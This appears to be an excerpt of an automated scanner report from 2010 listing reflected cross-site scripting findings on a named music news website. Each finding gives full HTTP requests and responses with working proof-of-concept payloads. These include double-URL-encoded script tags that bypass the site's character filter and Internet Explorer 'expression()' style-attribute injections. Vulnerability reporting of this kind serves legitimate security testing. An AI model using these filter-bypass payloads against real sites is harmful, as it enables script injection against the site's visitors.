This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news5d27c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e17f3fae913f/article/5082/guy-sebastian-re-inks-deal-with-sony-music HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87994
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4939'%3b74b0a8d079c was submitted in the REST URL parameter 1. This input was echoed as a4939';74b0a8d079c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsa4939'%3b74b0a8d079c/article/5082/guy-sebastian-re-inks-deal-with-sony-music HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88021
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cbfc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e60376ad53ee was submitted in the REST URL parameter 2. This input was echoed as 5cbfc"><script>alert(1)</script>60376ad53ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article5cbfc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e60376ad53ee/5082/guy-sebastian-re-inks-deal-with-sony-music HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88700
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28c6f'%3b9647d275d9d was submitted in the REST URL parameter 2. This input was echoed as 28c6f';9647d275d9d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/article28c6f'%3b9647d275d9d/5082/guy-sebastian-re-inks-deal-with-sony-music HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88037
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3aec1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6787036f4 was submitted in the REST URL parameter 4. This input was echoed as 3aec1"><script>alert(1)</script>df6787036f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article/5082/guy-sebastian-re-inks-deal-with-sony-music3aec1%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edf6787036f4 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 135207
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Guy Sebastian re-inks deal w ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music3aec1"><script>alert(1)</script>df6787036f4" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb687%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252798d0748ea4d was submitted in the REST URL parameter 4. This input was echoed as eb687'style='x:expression(alert(1))'98d0748ea4d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article/5082/guy-sebastian-re-inks-deal-with-sony-musiceb687%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252798d0748ea4d HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:16:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 134838
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Guy Sebastian re-inks deal w ...[SNIP]... <link rel='canonical' href='http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-musiceb687'style='x:expression(alert(1))'98d0748ea4d' /> ...[SNIP]...
2.383. http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e73f8"style%3d"x%3aexpression(alert(1))"6ba8bd82e09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e73f8"style="x:expression(alert(1))"6ba8bd82e09 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /news/article/5082/guy-sebastian-re-inks-deal-with-sony-music?e73f8"style%3d"x%3aexpression(alert(1))"6ba8bd82e09=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:14:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 134794
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Guy Sebastian re-inks deal w ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5082/guy-sebastian-re-inks-deal-with-sony-music?e73f8"style="x:expression(alert(1))"6ba8bd82e09=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 537c4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09a1bbe3b8c was submitted in the REST URL parameter 1. This input was echoed as 537c4"><script>alert(1)</script>09a1bbe3b8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news537c4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e09a1bbe3b8c/article/5083/manic-street-preachers-reveal-working-title-of-next-album HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88103
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1adf4'%3b948ec397c13 was submitted in the REST URL parameter 1. This input was echoed as 1adf4';948ec397c13 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news1adf4'%3b948ec397c13/article/5083/manic-street-preachers-reveal-working-title-of-next-album HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87913
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c342'%3bb6a8ae4e4d9 was submitted in the REST URL parameter 2. This input was echoed as 4c342';b6a8ae4e4d9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/article4c342'%3bb6a8ae4e4d9/5083/manic-street-preachers-reveal-working-title-of-next-album HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88067
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd8cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eef39ff5000c was submitted in the REST URL parameter 2. This input was echoed as cd8cb"><script>alert(1)</script>ef39ff5000c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/articlecd8cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eef39ff5000c/5083/manic-street-preachers-reveal-working-title-of-next-album HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88119
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7548%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c7804749d5 was submitted in the REST URL parameter 4. This input was echoed as f7548"><script>alert(1)</script>9c7804749d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article/5083/manic-street-preachers-reveal-working-title-of-next-albumf7548%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c7804749d5 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:18 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 107503
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 13591%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252785cc4b0dd1d was submitted in the REST URL parameter 4. This input was echoed as 13591'style='x:expression(alert(1))'85cc4b0dd1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article/5083/manic-street-preachers-reveal-working-title-of-next-album13591%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252785cc4b0dd1d HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 107802
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Manic Street Preachers revea ...[SNIP]... <link rel='canonical' href='http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album13591'style='x:expression(alert(1))'85cc4b0dd1d' /> ...[SNIP]...
2.390. http://bigpondmusic.com/news/article/5083/manic-street-preachers-reveal-working-title-of-next-album [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 690b2"style%3d"x%3aexpression(alert(1))"f70bb7279cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 690b2"style="x:expression(alert(1))"f70bb7279cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /news/article/5083/manic-street-preachers-reveal-working-title-of-next-album?690b2"style%3d"x%3aexpression(alert(1))"f70bb7279cc=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
